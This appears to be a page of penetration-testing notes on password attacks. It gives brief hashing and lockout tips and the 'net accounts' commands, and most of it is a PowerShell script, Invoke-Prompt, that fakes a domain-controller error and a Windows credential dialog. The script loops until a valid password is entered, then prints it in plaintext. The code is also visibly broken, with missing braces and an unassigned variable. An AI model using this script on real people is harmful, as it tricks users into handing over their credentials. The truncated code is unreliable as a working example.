Password Attacks

File hashing should be fast - used to determine integrity

Password hashing should be SLOW - used to increase amount of work for cracking

Be careful not to lock out legitimate users, as this will impact operational needs of the target

Check windows password settings

net accounts
net accounts /domain

Sometimes, we can just ask for creds!

# POC from greg.foss[at]
# @enigma0x3
# Adapted from

function Invoke-Prompt {
    Param (
        [Switch] $ProcCreateWait,
        [String] $MsgText = 'Lost contact with the Domain Controller.',
        [String] $IconType = 'Critical',
        [String] $Title = 'ERROR - 0xA801B720'
    Add-Type -AssemblyName Microsoft.VisualBasic
    Add-Type -assemblyname System.DirectoryServices.AccountManagement
    $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
    if($MsgText -and $($MsgText -ne '')){
        $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title)
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
           while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True){
              $credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
        "[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password
        "[!] User closed credential prompt"

Last updated